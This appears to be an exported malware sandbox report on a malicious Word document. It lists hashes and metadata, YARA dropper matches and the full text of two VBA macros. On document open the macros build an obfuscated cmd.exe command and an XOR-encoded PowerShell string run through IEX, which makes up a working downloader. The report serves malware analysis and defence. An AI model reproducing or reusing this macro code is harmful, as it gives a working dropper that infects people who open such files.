8ed61abc...6ae9 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: -

8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9 (SHA256)

(5)DOC20181114214.doc

Word Document

Created at 2018-11-14 09:18:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\(5)DOC20181114214.doc Sample File Word Document
Suspicious
...
»
Mime Type application/msword
File Size 91.50 KB
MD5 bdd9fe7dae3fc4b751f17f13ec9d41b7 Copy to Clipboard
SHA1 07b3785d52e55f55c5613800362f959276b95c57 Copy to Clipboard
SHA256 8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9 Copy to Clipboard
SSDeep 1536:a2Svw6xp+hXOl8kqocvvDA3TyHhyRVG4lsIKH:al4K+htnBmVdlw Copy to Clipboard
Office Information
»
Title 稟 議 書
Revision 7
Create Time 2017-01-25 15:35:00+00:00
Modify Time 2018-11-14 07:51:00+00:00
Last Printed 2015-11-13 15:39:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 14.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Editing Time 5460.0
Page Count 1
Line Count 3
Paragraph Count 1
Word Count 80
Character Count 459
Chars With Spaces 538
Heading Pairs タイトル, Title
Titles Of Parts 稟 議 書, 稟 議 書
scale_crop False
shared_doc False
VBA Macros (2)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ClearClipboard()
    OpenClipboard (0)
    EmptyClipboard
    CloseClipboard
End Sub

Sub Forms2F()
njk
Call Shell(marrsell + sdemom, 14 - 14)
End Sub
Sub AutoOpen()
  Forms2F
End Sub
Function marrsell()
marrsell = AndPlus
End Function
Sub njk()
sStr = librarybooks
mmm (sStr)
End Sub
Function settler()
settler = "C"
End Function
Function doublecheck()
doublecheck = "md.exe /V:ON/C""set begw=r$Oq\a+N,=^^oWR^&;1TSXs{u""""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd &&for %4 in (38,2,12,70,0,18,74,70,48,48,81,81,35,7,2,38,81,35,12,81,16,81,81,81,24,81,14,81,49,81,1,66,18,58,11,59,33,25,30,55,6,1,38,18,58,2,59,33,25,75,63,55,6,37,19,37,34,81,49,81,49,35,57,2,76,52,25,13,70,72,70,19,55,28,28,59,5,17,73,74,70,20,49,4,24,81,34,81,34,67,75,55,13,5,74,73,25,8,37,79,66,0,37,81,33,44,5,48,66,33,0,73,35,36,67,55,13,5,74,73,25,8,37,62,73,38,37,81,81,33,44,5,48,66,33,0,73,35,81,81,36,75,55,13,5,74,73,25,8,37,29,52,44,37,81,33,44,5,48,66,33,0,73,35,81,81,30,75,55,13,5,74,73,25,8,37,71,22,50,37,81,81,33,44,5,48,66,33,0,73,35,34,37,34,78,80,21,29,52,44,49,34,79,66,0,33,76,79,66,0,8,79,66,0,47,79,66,0,26,35,81,71,22,50,78,63,21,78,16,21,71,22,50,49,31,15,34,78,71,22,50,60,19,62,73,38,70,17,71,22,50,31,78,62,62,73,38,60,21,29,52,44,9,78,80,21,29,52,44,37,6,37,15,71,22,50,60,47,33,62,73,38,17,71,22,50,31,78,37,6,3"
End Function
Function formsands()
formsands = "7,62,62,73,38,60,21,29,52,44,15,34,49,33,43,11,77,52,46,31,34,79,66,0,33,60,20,5,79,66,0,8,79,66,0,66,79,66,0,26,35,37,6,37,71,22,50,78,16,21,78,63,21,71,22,50,49,31,78,64,17,21,37,6,37,29,52,44,15,78,70,22,13,62,73,38,17,21,29,52,44,81,37,6,37,9,81,71,22,50,33,7,46,62,73,38,65,62,73,38,76,60,48,22,42,71,22,50,31,78,62,62,73,38,60,21,29,52,44,15,34,79,66,0,33,60,20,50,79,66,0,8,79,66,0,18,37,6,37,79,66,0,8,79,66,0,20,59,0,11,79,79,66,0,8,79,66,0,31,20,69,11,80,52,76,12,31,59,79,66,0,8,79,66,0,47,11,62,79,66,0,8,79,66,37,6,37,0,60,47,33,17,31,79,66,0,26,37,6,37,35,81,71,22,50,78,16,21,78,63,21,78,75,21,78,61,21,78,40,21,78,30,21,71,22,50,49,81,34,79,66,0,60,73,79,66,0,8,79,66,0,7,79,66,0,8,79,66,0,33,71,64,2,35,69,33,79,66,0,26,35,81,71,22,50,78,61,21,78,63,21,78,16,21,71,22,50,49,10,14,81,9,81,78,62,62,73,38,60,21,29,52,44,21,81,33,20,65,33,81,78,34,71,22,50,60,47,62,73,38,33,17,62,73,38,33,80,2,73,46,7,37,6,37,22,71,22,50,28,28,3,54,0,58,46,41,29,"
End Function
Function cleardatas()
cleardatas = "52,44,81,49,37,6,37,71,22,50,60,47,33,62,73,38,17,60,70,72,71,22,50,28,28,70,22,48,54,39,31,34,81,81,34,79,66,0,67,79,66,0,37,6,37,6,79,66,0,17,30,61,57,79,66,0,49,81,81,34,79,37,6,37,66,0,54,39,79,66,0,8,79,66,0,70,48,62,5,46,0,79,66,0,81,26,35,71,22,50,78,63,21,78,16,21,71,22,50,49,31,81,81,49,81,81,9,78,45,21,29,52,44,21,81,34,79,66,0,54,17,18,79,66,0,81,3,33,35,81,34,49,33,43,11,77,52,46,31,34,79,66,0,18,37,6,37,11,17,79,66,0,8,79,66,0,0,60,79,66,0,8,79,66,0,72,52,76,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,31,71,22,50,33,60,54,62,73,38,17,62,73,38,18,60,52,70,59,17,13,54,62,73,38,66,54,71,22,50,31,71,22,50,80,54,62,73,38,70,0,58,17,60,7,62,73,38,70,62,73,38,0,13,22,73,71,22,50,28,37,6,37,28,70,56,65,5,39,31,34,81,34,79,66,0,56,79,66,0,6,79,66,0,19,18,79,66,0,6,79,66,0,28,33,37,6,37,65,79,66,0,37,6,37,6,79,66,0,64,5,46,0,5,39,79,66,0,49,81,34,79,66,0,33,51,79,66,0,37,6,37,8,79,66,0,35,17,79,66,0,8,79,66,0,42,70,60,76,79,66"
End Function
Function commde()
commde = ",0,81,26,35,71,22,50,78,63,21,37,6,37,78,16,21,78,61,21,71,22,50,49,31,81,49,81,81,49,81,26,76,49,29,52,44,15,34,79,66,0,12,31,79,66,0,8,79,66,0,20,59,0,11,79,31,37,6,37,20,69,11,80,52,76,79,66,0,8,79,66,0,33,79,66,0,8,79,66,0,60,20,50,18,37,6,37,79,66,0,8,79,37,6,37,66,0,59,79,66,0,26,35,81,71,22,50,78,75,21,78,30,21,78,63,21,78,61,21,78,16,21,71,22,50,49,81,33,59,5,7,50,65,64,59,33,20,20,54,35,81,34,79,66,0,80,54,79,66,0,8,79,66,0,17,35,80,37,6,37,79,66,0,8,79,66,0,37,6,37,33,38,50,79,66,0,26,35,71,22,50,78,63,21,78,16,21,78,61,21,71,22,50,49,10,14,15,78,34,79,66,0,5,11,64,38,76,65,79,66,0,8,79,66,0,44,35,60,33,51,79,66,37,6,37,0,8,79,66,0,80,0,79,66,0,81,26,35,81,71,22,50,78,63,21,78,61,21,78,37,6,37,16,21,71,22,50,49,31,9,78,80,21,29,52,44,21,81,34,63,81,5,33,35,81,34,37,6,37,79,66,0,76,65,44,35,60,79,66,0,8,79,66,0,11,37,6,37,64,38,79,66,0,8,79,66,0,80,0,5,79,66,0,37,6,37,8,79,66,0,33,51,79,66,0,26,35,81,37,6,37,71,22,50,78,16,21,78,37,6,37,61,21,78,75,21"
End Function
Function crsss()
crsss = ",78,63,21,71,22,50,49,81,34,79,66,0,59,79,66,0,8,79,66,0,73,72,79,66,0,81,26,35,81,71,22,50,78,16,21,78,63,21,71,22,50,49,10,14,49,81,26,76,15,37,6,37,81,34,79,66,0,60,47,33,79,66,0,8,79,66,0,60,5,79,66,0,8,79,66,0,54,17,5,79,66,0,8,79,66,0,42,37,6,37,13,2,79,37,6,37,79,66,0,8,79,66,0,17,31,18,59,0,11,26,31,18,12,11,45,7,76,69,31,59,33,79,66,0,37,6,37,8,79,66,0,80,79,66,0,8,79,66,0,17,20,68,20,79,66,0,26,35,71,22,50,78,40,21,78,75,21,78,30,21,78,16,21,78,37,6,37,36,21,78,61,21,78,63,21,71,22,50,49,55,33,66,68,17,25,81,81,9,81,27,54,13,74,46,41,29,52,44,81,81,37,6,37,15,81,34,79,66,0,65,44,31,18,79,66,0,8,79,66,0,59,13,11,79,66,0,8,79,66,0,45,79,66,0,8,79,66,0,26,79,66,0,8,79,66,0,0,5,11,79,66,0,8,79,66,0,69,31,42,70,17,18,79,66,0,8,79,66,0,64,66,46,79,66,0,8,79,66,0,20,79,66,0,8,79,66,0,68,79,66,0,8,79,66,0,31,20,12,11,45,52,46,79,66,0,79,35,71,22,50,78,32,21,78,40,21,78,75,21,78,67,21,78,53,37,6,37,21,78,36,21,78,37,6,37,63,21,78,30,21,78,16,21,78,61,21,71,22,50,49,55,33,66"
End Function
Function AndPlus()
AndPlus = settler + doublecheck + formsands + cleardatas + commde + crsss
End Function
Function sdemom()
sdemom = ",68,17,25,81,9,67,17,30,61,37,6,37,71,29,52,44,81,81,15,34,79,66,0,60,79,66,0,37,6,37,8,79,66,0,54,33,0,74,17,79,66,0,8,79,66,0,31,51,7,76,45,79,66,0,8,79,66,0,80,54,79,66,0,8,79,37,6,37,66,0,70,0,58,79,66,0,26,35,71,22,37,6,37,50,78,16,21,78,63,21,78,30,21,78,61,21,78,75,21,71,22,50,49,37,6,37,55,33,38,50,60,25,81,81,9,81,22,19,20,29,52,44,37,6,37,81,37,49,49,81,49,81,34,37,47,37,6,55,30,75,25,33,59,2,74,18,38,1,6,55,16,61,25,33,59,11,58,20,66,1,81,49,10,14,81,4,24,8,37,31,37,81,8,37,0,76,72,74,17,37,6,37,60,2,37,6,37,65,33,79,17,37,81,34,34,81,34,81,24,83)do set tGCX=!tGCX!!begw:~%4,1!&&if %4 geq 83 cmd.exe /C!tGCX:~-1865!"""
End Function


Function librarybooks()
librarybooks = samrdee + AcrivDoxs + checkpic + treedocuments + FunctionalProperties + CalculationOne
End Function
Function samrdee()
samrdee = " -JO" + "in ('107%101_109v101r97O22O45O0r41r9U12H33%30_116_24H110v97_54H13U0{41_41r12O1U30O116H118{24<110_98v29H98v108v109c101<11{32<18v104U10%39<15_32H38H49O101v22O60<22v49r32c8{107v44U42_107H6H42U40_53{55U0{54v22O44U10O11%107r1_0H3U41v36%49<32O22v49H23r0v4H40O109c101v30_12<42_107<40%0H40c42H55H28O22H17%55%0r4%40O24c30U54_28r54v17U0O8<107<6%42_11{19%32{55r49c24{127<127H35v55{10v8v7U4r54U32<115U113%54%17v55U44O43v34H109U98{17%31<3_7v39H124_53O4U0r12r29%106v60{54{47H44v28%0_49_113c39_20%33v47<42c41{34O112{23%1{20U15%16c34v12U124H34%8H20<45v55r36c55{116{32r42O60v118H55O13_32U49{119O36U18H2H12{51_112v114H3r115r15U14c48<38r115v125O39r106v17c32<2{124{41{4O2c9c115U44c44{114U33O22r55<117U106U18r28r35{33O48<7v3c38r28c54{33H18r45{52%112%7H32_1O13U29%38U54{35O40r7c6%9<16O113v55{16<124<33_31v23v17<0c22O110O112H0c6H61H110_44_112v35_20_63{14_115v39r23%32<29U20O34_31U23v110O1_116O55<43_110O12H16%40r117H11{13_51H60%40{1{7c33%12%53U23O54U53%14H115v31c8O55H49H34r13c"
End Function
Function AcrivDoxs()
AcrivDoxs = "4c23c41r28{50O44U112U36r8v8U55U4c19c9U1v47{28c63O10v2_63<52{33H7U112c12U10O113_113%18U61c114%47_28v49H23H117{117O21v47_61v6r8_16%21H124r112%125O8U114H115H13v113r22<33r33%4<115O15v113r23r2H1r38<51r49%3{118c51c17H41_36c7v7<32%51U38v12r45O106v41r114{124v23c48{13c34_8r50<124O39c42H18v11c39v55%10_31O14<42c43v31H29H3_19r54O34<55{112<0{54%32r115%55U55%8U1r45O28<53%15v47H51{106O8U114%39{18%112U52v106<16v44_40O32H17c3_46c14<42r36O110%46U11U42c10O3<116v20r36c60O41U14v16H41H110c0%2U23U41r118H4_54{125H34r44U32H110U41c115c45O21<106H54<40{29H17%14v33c63_11r44H46H34{21v7{49{54H19v40H110O47{117_13U15r21r38H12r55H44v55c119%15{28%11v115v22_115_17U4v53U38r53r36r60c60<33_118c124%13c38{51r60<3v11_36%125v113U22O17%106U28r125U106{116_1O53_11r54v61_55{15r31O11c54U40U1<115O10O39r50r40c61_40r117{8U55r61r110%46<20%53{51H17v28H119r51H0O36<21{22%10U46U115_35c36r22v51<35<113%51_113U60%51O106U114{45<106v9v18r12%29{110H63v112_14{9_7%118H117U40O44r119c23c2_49c124_54H54H51%41_125c34r125r120%98H108"
End Function
Function checkpic()
checkpic = "U105%30%44v10r107v38%42U8v53{55_32O22<54H44%42r43H107H6%10O40r53O55{32_54c22<44v42r43O8<10O1<32{24%127c127H33r0%38<10O8H53{55H0U22<54c108O57v35v42O23v32v36<38{45v101O62{101<11{32H18<104v10U39O15U32<38v49_101r101v44<42H107v54_49_23{0v4<40c23{0c36_1H32<23r109{97O26v101_105_30<17_0c61{17<107r0r43U6O42H33v12v11v2O24%127H127v36H22%38<12U12%108{101_56r101{57H3v10H55v32%36c38U13r62U101v97{26<107v55<32H4O33{49v42v32U11_1c109U108r101_56H108' -split '{' -SPlIT 'C'-sPLIt 'u'-SplIT '<' -SPLit'%'-SplIT 'h'-sPlIt'V'-SpLit'O'-SpLiT'_' -SPLiT'R'| .(""{3}{1}{0}{2}"" -f 'CH-','ORea','oBjEcT','f'){ [ChAR] (${_} -bXoR(""{0}{1}"" -f '0x','45')) } )|.(""{0}{1}"" -f 'I','eX')"
End Function
Function treedocuments()
treedocuments = ""
End Function
Function FunctionalProperties()
FunctionalProperties = ""
End Function
Function CalculationOne()
CalculationOne = ""
End Function
Macro #2: Module1
» 
Attribute VB_Name = "Module1"
Option Explicit
Private Declare PtrSafe Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalFree Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalLock Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalSize Lib "kernel32" (ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GlobalUnlock Lib "kernel32" (ByVal hMem As LongPtr) As Long
Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As LongPtr) As Long
Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
Private Declare PtrSafe Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As LongPtr) As LongPtr
Private Declare PtrSafe Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As LongPtr
Private Declare PtrSafe Function lstrcpy Lib "kernel32" (ByVal lpString1 As Any, ByVal lpString2 As Any) As LongPtr

Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_ZEROINIT = &H40
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)

Public Const CF_TEXT = 1
Public Const MAXSIZE = 4096

Sub mmm(MyString As String)
    Dim hGlobalMemory As LongPtr, lpGlobalMemory As LongPtr
    Dim hClipMemory As LongPtr, X As Long


    hGlobalMemory = GlobalAlloc(GHND, Len(MyString) + 1)


    lpGlobalMemory = GlobalLock(hGlobalMemory)


    lpGlobalMemory = lstrcpy(lpGlobalMemory, MyString)


    If GlobalUnlock(hGlobalMemory) <> 0 Then

       GoTo OutOfHere
    End If


    If OpenClipboard(0&) = 0 Then

       Exit Sub
    End If


    X = EmptyClipboard()


    hClipMemory = SetClipboardData(CF_TEXT, hGlobalMemory)

OutOfHere:
    If CloseClipboard() = 0 Then
       MsgBox "*"
    End If
End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
c:\users\aetadzjz\appdata\local\gdipfontcachev1.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 109.69 KB
MD5 8c07b597e04adb6ef1c7a91e611668d8 Copy to Clipboard
SHA1 03bfce03604869383ecb864c4d8ab9b99d4af8c8 Copy to Clipboard
SHA256 63304f19e0ad5ec509b7e5484ec4074b451db2379f2838de3b4b2c14c8b6dd8c Copy to Clipboard
SSDeep 1536:A2cnwUXHgTlmIUxyX337I5NZjP4LMLzZ5KsLJ:PTArrHvLJ Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image